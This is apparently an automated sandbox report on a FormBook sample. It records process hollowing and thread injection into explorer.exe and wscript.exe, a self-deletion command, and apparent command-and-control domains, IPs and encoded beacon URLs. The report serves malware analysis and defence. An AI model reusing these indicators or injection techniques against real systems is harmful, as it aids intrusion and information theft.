Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052252A5 mov eax, dword ptr fs:[00000030h]	9_2_052252A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052252A5 mov eax, dword ptr fs:[00000030h]	9_2_052252A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052252A5 mov eax, dword ptr fs:[00000030h]	9_2_052252A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F0EA5 mov eax, dword ptr fs:[00000030h]	9_2_052F0EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F0EA5 mov eax, dword ptr fs:[00000030h]	9_2_052F0EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F0EA5 mov eax, dword ptr fs:[00000030h]	9_2_052F0EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A46A7 mov eax, dword ptr fs:[00000030h]	9_2_052A46A7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0523AAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0523AAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525FAB0 mov eax, dword ptr fs:[00000030h]	9_2_0525FAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BFE87 mov eax, dword ptr fs:[00000030h]	9_2_052BFE87
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525D294 mov eax, dword ptr fs:[00000030h]	9_2_0525D294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525D294 mov eax, dword ptr fs:[00000030h]	9_2_0525D294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052376E2 mov eax, dword ptr fs:[00000030h]	9_2_052376E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252AE4 mov eax, dword ptr fs:[00000030h]	9_2_05252AE4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052516E0 mov ecx, dword ptr fs:[00000030h]	9_2_052516E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05268EC7 mov eax, dword ptr fs:[00000030h]	9_2_05268EC7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052536CC mov eax, dword ptr fs:[00000030h]	9_2_052536CC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052DFEC0 mov eax, dword ptr fs:[00000030h]	9_2_052DFEC0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252ACB mov eax, dword ptr fs:[00000030h]	9_2_05252ACB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F8ED6 mov eax, dword ptr fs:[00000030h]	9_2_052F8ED6

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Code function: 3_2_00409B40 LdrLoadDll,

3_2_00409B40

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 108.179.246.105 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.corlora.com
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.thehauntdepot.com
Source: C:\Windows\explorer.exe	Domain query: www.bellaalubo.com
Source: C:\Windows\explorer.exe	Domain query: www.pastlinks.com
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 54.85.93.188 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.jspagnier-graveur.com
Source: C:\Windows\explorer.exe	Domain query: www.behiscalm.com
Source: C:\Windows\explorer.exe	Domain query: www.productprinting.online
Source: C:\Windows\explorer.exe	Domain query: www.miyonbuilding.com

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 12B0000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Memory written: C:\Users\user\Desktop\UaTmOE6yP9.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Thread register set: target process: 3440			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 3440			Jump to behavior

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe C:\Users\user\Desktop\UaTmOE6yP9.exe			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe'			Jump to behavior

Source: UaTmOE6yP9.exe, 00000000.00000002.608713457.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.368759315.0000000000EE0000.00000002.00020000.sdmp, wscript.exe, 00000009.00000002.608369932.0000000003AB0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: UaTmOE6yP9.exe, 00000000.00000002.608713457.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.368759315.0000000000EE0000.00000002.00020000.sdmp, wscript.exe, 00000009.00000002.608369932.0000000003AB0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: UaTmOE6yP9.exe, 00000000.00000002.608713457.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.368759315.0000000000EE0000.00000002.00020000.sdmp, wscript.exe, 00000009.00000002.608369932.0000000003AB0000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: UaTmOE6yP9.exe, 00000000.00000002.608713457.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.368759315.0000000000EE0000.00000002.00020000.sdmp, wscript.exe, 00000009.00000002.608369932.0000000003AB0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Queries volume information: C:\Users\user\Desktop\UaTmOE6yP9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Virtualization/Sandbox Evasion12	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Virtualization/Sandbox Evasion12	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection612	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information4	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing3	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
UaTmOE6yP9.exe	44%	Virustotal		Browse
UaTmOE6yP9.exe	37%	Metadefender		Browse
UaTmOE6yP9.exe	78%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
UaTmOE6yP9.exe	100%	Avira	TR/Dropper.Gen
UaTmOE6yP9.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.UaTmOE6yP9.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
productprinting.online	0%	Virustotal	Browse
td-balancer-euw2-6-109.wixdns.net	0%	Virustotal	Browse
behiscalm.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://www.namebrightstatic.com/images/bg.png)	0%	Avira URL Cloud	safe
http://www.productprinting.online/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ==	0%	Avira URL Cloud	safe
https://www.namebrightstatic.com/images/site_maintenance.png)	0%	Avira URL Cloud	safe
www.simpeltattofor.men/mjyv/	100%	Avira URL Cloud	malware
https://www.namebrightstatic.com/images/logo_off.gif)	0%	Avira URL Cloud	safe
http://www.behiscalm.com/mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3	0%	Avira URL Cloud	safe
http://www.chinatowndeliver.com/mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3	0%	Avira URL Cloud	safe
http://www.jspagnier-graveur.com/mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3	0%	Avira URL Cloud	safe
http://www.corlora.com/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg==	0%	Avira URL Cloud	safe
http://www.bellaalubo.com/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw==	0%	Avira URL Cloud	safe
https://www.namebrightstatic.com/images/error_board.png)	0%	Avira URL Cloud	safe
https://www.namebrightstatic.com/images/header_bg.png)	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
productprinting.online	108.179.246.105	true	true	0%, Virustotal, Browse	unknown
td-balancer-euw2-6-109.wixdns.net	35.246.6.109	true	false	0%, Virustotal, Browse	unknown
behiscalm.com	34.102.136.180	true	false	1%, Virustotal, Browse	unknown
chinatowndeliver.com	34.102.136.180	true	false		unknown
shops.myshopify.com	23.227.38.74	true	true		unknown
cdl-lb-1356093980.us-east-1.elb.amazonaws.com	54.85.93.188	true	false		high
www.chinatowndeliver.com	unknown	unknown	true		unknown
www.corlora.com	unknown	unknown	true		unknown
www.jspagnier-graveur.com	unknown	unknown	true		unknown
www.thehauntdepot.com	unknown	unknown	true		unknown
www.bellaalubo.com	unknown	unknown	true		unknown
www.behiscalm.com	unknown	unknown	true		unknown
www.productprinting.online	unknown	unknown	true		unknown
www.miyonbuilding.com	unknown	unknown	true		unknown
www.pastlinks.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.productprinting.online/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ==	true	Avira URL Cloud: safe	unknown
www.simpeltattofor.men/mjyv/	true	Avira URL Cloud: malware	low
http://www.behiscalm.com/mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3	false	Avira URL Cloud: safe	unknown
http://www.chinatowndeliver.com/mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3	false	Avira URL Cloud: safe	unknown
http://www.jspagnier-graveur.com/mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3	true	Avira URL Cloud: safe	unknown
http://www.corlora.com/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg==	true	Avira URL Cloud: safe	unknown
http://www.bellaalubo.com/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw==	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000005.00000000.391155069.000000000095C000.00000004.00000020.sdmp	false		high
https://www.namebrightstatic.com/images/bg.png)	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://c.statcounter.com/9484561/0/b0cbab70/1/	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false		high
https://www.namebrightstatic.com/images/site_maintenance.png)	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.namebrightstatic.com/images/logo_off.gif)	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://statcounter.com/	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false		high
https://www.namebrightstatic.com/images/error_board.png)	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.namebrightstatic.com/images/header_bg.png)	wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
108.179.246.105	productprinting.online	United States	46606	UNIFIEDLAYER-AS-1US	true
35.246.6.109	td-balancer-euw2-6-109.wixdns.net	United States	15169	GOOGLEUS	false
54.85.93.188	cdl-lb-1356093980.us-east-1.elb.amazonaws.com	United States	14618	AMAZON-AESUS	false
34.102.136.180	behiscalm.com	United States	15169	GOOGLEUS	false
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	492896
Start date:	29.09.2021
Start time:	04:37:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	UaTmOE6yP9 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/0@9/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 19.9% (good quality ratio 18%) Quality average: 72.8% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 64 Number of non-executed functions: 129
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 23.211.4.86, 20.50.102.62 Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54.85.93.188	QUOTATION.exe	Get hash	malicious	Browse	www.bleuexpress.com/c2ue/?p2MH=J8K8iHaOEwQfDdmva6OuDgpCi58OenAq39o1cI0XPr5XOuRBUSPIYOGPFR5DGBu0wMj3v8X2KQ==&GFQ=7nstNj7HDjP876
	truck pictures.exe	Get hash	malicious	Browse	www.tapestrirewards.com/cuig/?9rKPkT=2dfXcPxP_&yTbXp6=rqMojoVU4+Uq2JMOXBh+qMT4A7CXTZvPilNgPjYsWJhfoGCZwdsRhz8WS5UBO4Wo5xtn
	DOC.exe	Get hash	malicious	Browse	www.kanchanaburiclub.com/imm8/?oZBd28E8=dgQ4CeCrSvdlr0wO8gDeYSIVUYIVGFS2JcvD/VIB9WSM9rjznBISObnjhDeypap8IEop&7n6hj=p2MtFfu8w4Y
	REQUEST_PURCHASE_INQUIRY (2).exe	Get hash	malicious	Browse	www.jjkvic.com/im8r/?YdZ=BRR8Rfg8lLYTFV&oP4D7=D2j/KZsjf3nvePcnIuK3h0vppiNFVxsC6H1qkOoKQQ8SKR5XOE/13WfbsLGet6wmNKFP
23.227.38.74	MDM 467574385758 SKTPCC AFRICAGM64635664.exe	Get hash	malicious	Browse	www.werloshop.com/ni8b/?h4L=m2EtCHo26e/nKho8wc405tLWZu08h5d177wDgfP68XcA4eKBSPEe0wV8Hz5GADmxoMby&UR-=4hgT624PnzETpxLP
	BERN210819.exe	Get hash	malicious	Browse	www.reviewallstarscommerce.com/dhua/?D8ChAd=tPVLutthX&1bUt-=8Nyn/XL53QRin4AZYQEJP5jICkJkpUExWXTTV3xx1qwR7gTgTHdZ4XFqaYA2M4MrMHGD
	4zaCyqmOmM.exe	Get hash	malicious	Browse	www.atheanas.com/vngb/?hVoP=6lElp&1bKl2=Do4PgwBHBf9HKdeVzLlVpyHNIKvOXNIqezXIwvRtQPCfB0krrWmytMYEHysMyaefmBqf
	INVOICE.exe	Get hash	malicious	Browse	www.floydsteven.space/avqp/?LVl4iT=JN6HZxgh3h&nVw=vfP5koDqgsgHC9T3oktzzKdNmAAHN1hZxHZKG5Jsk5Rkqo0eIk5dHyW8zQMC4GzToTEz
	68uuwMDMUk.exe	Get hash	malicious	Browse	www.americanrenegadeclothingco.com/hp6s/?t4L=-ZcTJHu&z6Ap=5lwPdUci/GaMlLqZiZifcc1Wx084NG1czI1/YTDNX1Oj8AHYAxOFbvaoDgkZeoGTAQ01
	SecuriteInfo.com.Scr.Malcodegdn30.14006.exe	Get hash	malicious	Browse	www.rocketdealfinder.com/jdt0/?6lHXZ6uH=gtLlkNSDZhnSLx38ddDevTqYs8e8flOlYz5R/lbKzvUDvibK3Uox/lieK7/2psuOIAgV&w2=EtxxATV
	COURT-ORDER#S12GF803_zip.exe	Get hash	malicious	Browse	www.eveyah.com/u86g/?Q8JxYX5=oaIbXD8M2AGRIyF0yJHpQgnh0/Lgzp8U2H3yKCHD9nw1dzOuIuZRR6r/Hd9qAua8Ea2C&pZbH=JJBDHfvx5FFXE42
	DO526.doc	Get hash	malicious	Browse	www.adaiahsboutique.com/fzsg/?7nqHR=ZTwgpJZVmaQ0FtsOKZ8l/DyAMJc4fQOxmUNCITj0wbAekR1xUuffVJmNwmthYiE2kfwcOQ==&Tpg8rN=mvBHQ00X2ZkLDVx
	Orden specifications_pdf.exe	Get hash	malicious	Browse	www.splashstoreofficial.com/dn7r/?Q8=q2MT&eB38=5G3OVyPIhPUtuf3RWdSHaeVrjv6atPLuLZF4jCOkE474QuLFsowMDjjv4lrrwiqwGOcVh9z2uQ==
	DUE PAYMENT.exe	Get hash	malicious	Browse	www.aydeyahouse.com/b2c0/?4hcTrT=mPotD&2dpPwJP=CKOO/2upcFO3xF+FvhJrZ9Hl5SoFLqUlaBpyNgiPLP9ULQmL1ZrDAqpWNLORbc5CJ4Ma
	SBGW#001232021.exe	Get hash	malicious	Browse	www.thesunrisecoffee.com/etaf/?6lttpr=PbbfUgonMl7N60AURdvjCGf5gXHvpP+vqyPFIWnbRFpEJUgyKIximmqLbTlae8shRZeO&JFND6z=_84lfN-p
	678901.exe	Get hash	malicious	Browse	www.newhousebr.com/b2c0/?XXut=DtHTzXpHJvwTW&T0DTobah=tu4FqrlxqkzSIx3U2Rx60Zos9k5v6uCXeSay1AldAEtNuUAzALs+TfOlBEkPyxsGqnb+Aqcnmw==
	purchase_order_list.exe	Get hash	malicious	Browse	www.hypnoticbeauty.net/ou3t/?k2JX=mrSFel4SoltItPYpQlfwEUEgftqMJIfiHJwCVdb3z1XtrBxC8J9onWUKJS9yWCdr+fNL&y2JtQ=Wj6tol
	Order Confirmation.exe	Get hash	malicious	Browse	www.gizmo-zone.com/ccxq/?5jblpb=Q8Gd4NQ&axodBzip=Vo/M3ZToq4SyqR51o7EU0eLDo86QeFvNtT2LIrH5qwSrp1UdTsekIGQ1rbBgSagY5QRq
	RFQ_Beijing Chengruisi Manufacturing_pdf.exe	Get hash	malicious	Browse	www.newbeautydk.com/euzn/?kP=4hRhxP&NFNTI8=6sAauxhAWaSEdgx8Bq+0dcztdOu3qC96/cvBc9T5RVr4NmWZka8MmsPmvN3gepCiLv3t
	Updated SOA 210920.PDF.exe	Get hash	malicious	Browse	www.eletro-laser.com/ny9y/?T2Jp=nnrwyWWjKNFqsz1qgnqP9ulHfQlItzZgm/anvADNP1vHPGlV/LpC2Qgsci0BAIJ4+H9A&SDH8q=KzrTopIpRT
	125M702vaO.exe	Get hash	malicious	Browse	www.youindependents.com/uytf/?7n5LWRVH=4gZWzCQQQof6TfL9TCCSfGm4hewDNvk12R65bFKWIyt/kIoizxJUETagGGtupH8JU+9Ml1F8Mg==&Z4wHXx=3fzDAV28rv
	sprogr.exe	Get hash	malicious	Browse	www.makemoneyfastdieyoung.com/myec/?TBZh=MBNPHfq8ptCTsVBwcciWKfcCglVWGB8DYVq6ygHSWV6Grk4JMsRIAtv0VUi9ld3Face5&-Z68=3fo0sXFHBDotf
	Cota#U00e7#U00e3o de produto.exe	Get hash	malicious	Browse	www.thetrophyworld.com/vd9n/?wTYhn6H=ZtD4MB4lt33J31dxlUKMze/4lIQauaFFKtJrlA0hzJ9l+5i+2kYp7LfxdojqYe+2YTVI&5j3=5jSxuD9xuvQTYnpP
